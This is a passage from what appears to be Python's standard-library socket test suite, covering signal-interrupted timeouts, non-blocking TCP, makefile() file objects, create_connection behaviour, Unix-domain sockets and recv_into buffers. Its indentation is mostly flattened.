# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) is interrupted by SIGALRM: the
        # ZeroDivisionError raised by the handler installed in setUp() must
        # propagate out of the blocking call rather than the call silently
        # retrying after EINTR.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, is interrupted
        # by SIGALRM: the ZeroDivisionError raised by the signal handler
        # must propagate out of the blocking call rather than the call
        # silently retrying after EINTR.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
        # Pass an actual address here because Python's wrapper for
        # sendto() doesn't allow a zero-length one; POSIX requires the
        # address to be ignored anyway, since the socket is
        # connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
        # bpo-7995: when accept() is called on a listening socket that has
        # a timeout and the default timeout is None, the resulting socket
        # must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: when accept() is called on a listening socket that has
        # a timeout and the default timeout is not None, the resulting
        # socket must inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the server sent data now: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
            encoding=self.encoding,
            errors=self.errors,
            newline=self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
            encoding=self.encoding,
            errors=self.errors,
            newline=self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
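    # For example, the pattern used below is roughly (illustrative only):
    #   self.cli_conn.setblocking(False)
    #   self.read_file.read(n)        # may return None when no data is available
    #   self.read_file.readinto(buf)  # likewise returns None instead of blocking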
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
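    # The pattern exercised below is roughly (illustrative sketch): pre-allocate
    # a buffer and let the kernel copy received bytes straight into it, e.g.
    #   buf = bytearray(1024)
    #   nbytes = sock.recv_into(buf)   # buf[:nbytes] now holds the received data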
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
